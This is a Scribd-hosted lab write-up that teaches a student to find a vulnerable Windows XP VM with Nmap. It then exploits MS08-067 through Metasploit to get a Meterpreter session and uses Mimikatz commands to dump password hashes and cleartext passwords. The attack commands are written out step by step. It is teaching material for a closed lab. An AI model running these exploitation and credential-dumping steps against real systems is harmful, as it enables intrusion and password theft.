0% found this document useful (0 votes)
454 views8 pages

Lab+ +Password+Cracking+Using+Mimikatz

This document provides an overview of using Mimikatz to crack passwords on a Windows system. It describes using Nmap to identify a vulnerable Windows XP system on the local network. An Meterpreter session is established using an ms08_067_netapi exploit. Mimikatz is used to dump password hashes from memory and the SAM file. Cleartext passwords are also retrieved using Mimikatz by decrypting the hashed passwords. The summary demonstrates how Mimikatz can be used as an attack tool to steal passwords from Windows systems.

Uploaded by

Mohcine Oubadi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
454 views8 pages

Lab+ +Password+Cracking+Using+Mimikatz

This document provides an overview of using Mimikatz to crack passwords on a Windows system. It describes using Nmap to identify a vulnerable Windows XP system on the local network. An Meterpreter session is established using an ms08_067_netapi exploit. Mimikatz is used to dump password hashes from memory and the SAM file. Cleartext passwords are also retrieved using Mimikatz by decrypting the hashed passwords. The summary demonstrates how Mimikatz can be used as an attack tool to steal passwords from Windows systems.

Uploaded by

Mohcine Oubadi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

Lab – Password Cracking Using Mimikatz

Overview

In this lab, the student will learn how to crack cleartext password from a Windows client
using Mimikatz. Mimikatz has become an extremely effective attack tool against Windows
clients, allowing bad actors to retrieve cleartext passwords, as well as password hashes from
memory. This lab will provide an overview of Mimikatz’s capabilities and payload vectors.

Hardware requirements

• Virtual install of Kali up and running (attacker)


• Virtual install of Windows XP Pro SP2 (victim)
• Both machines up and running and with connectivity between each.

To begin this lab, we will need an active Meterpreter session between Kali and the victim.

Begin the lab!

Open a terminal in Kali. At the prompt launch the Metasploit console.

Using the Nmap scripting engine, you can use the vulnerability scan script to check the first
1000 ports for known vulnerabilities.

Type the following command at the terminal prompt:

nmap -Pn --script vuln <IP address >

My victims network IP range is 192.168.145.0/24 Yours may differ. I Got the range from doing
an IFCONFIG form my Kali terminal. I took the first three octets of my IP address assigned to
my Kali machine, and that is my network IP. By giving the last (4th) octet a value of zero
followed by the CIDR notation of /24, I am telling Nmap to scan all 255 IP address possible for
this network.

I’m treating this as if I am looking for a victim. From my scan results, I see that there is a
machine that is vulnerable to the ms08_067_netapi exploit.

1
I’ve gotten enough information from the results, but I can still drill into this machine and
identify specifically what the machines’ operating system and service pack are.

Type the following command:

nmap --script smb-os-discovery.nse -p445 192.168.145.129

From my first scan, I learned that a machine, 192.168.145.129; was vulnerable using an SMB
exploit running on port 445. I scanned for the operating system information using another Nmap
script specifically targeting port 445 for the operating system information.

2
The first thing we need to do is get a Meterpreter session going. We have identified our victim
is having an SMB vulnerability using port 445 and Nmap has told us, the vulnerability is
identified as ms08_067_netapi. We now must search Metasploit for an exploit that can take
advantage of the vulnerability.

At the msf prompt type: search ms08_067

We see that there is an exploit we can use, with use being the optimal word. Highlight just the
name of the exploit in the search results. At the msf prompt, type the word use followed by one
single space. Place your cursor in the terminal window and right click and select paste.

Hit enter. Note the change in the prompt.

3
At the prompt type: options

We need to set the IP address of the RHOST (victim).

At the prompt type: set RHOST < IP address>

For me, this command looks like this: set RHOST 192.168.145.129
(This is my victim’s IP address, not yours! Yours will differ)

We can launch the payload by using the exploit command.

Success! We have our Meterpreter session.

Using Mimikatz to get the password in clear text

We load the Mimikatz tool onto the victim machine.

Type: load Mimikatz

4
We can check the version by typing: mimikatz_command -f version

We can use the help mimikatz command to see what hash credentials we can retrieve in clear
text. We’ll retrieve the passwords for two sets of credentials later in the lab.

We can get a complete list of the available modules by trying to load a non-existent feature.

Type: mimikatz _command -f fu::

5
Reading Hashes and Passwords from Memory

All passwords stored on a Windows machine are stored using a hash value. Mimikatz takes the
hash and decrypts it.

We can see both cleartext and hashed passwords with the Mimikatz tool.

With the MSV command, we see the hashed MSV credentials.

With the Kerberos command, we see the cleartext of the administrator password. Remember,
this is being pulled from memory.

6
The most common use for Mimikatz is to dump the hashes from the SAM file. The Security
Account Manager (SAM), often called the Security Accounts Manager, is a database file in
Windows XP, Windows Vista, and Windows 7 that stores users' passwords. It can be used to
authenticate local and remote users. Beginning with Windows 2000 SP4, Active Directory
authenticates remote users.

Type: mimikatz_command -f samdump::hashes

We can now need to use the power of mimikatz to decrypt the hashed password seen in the
SAM file.

Type: mimikatz_command -f sekurlsa::searchPasswords

7
End of the lab!

You might also like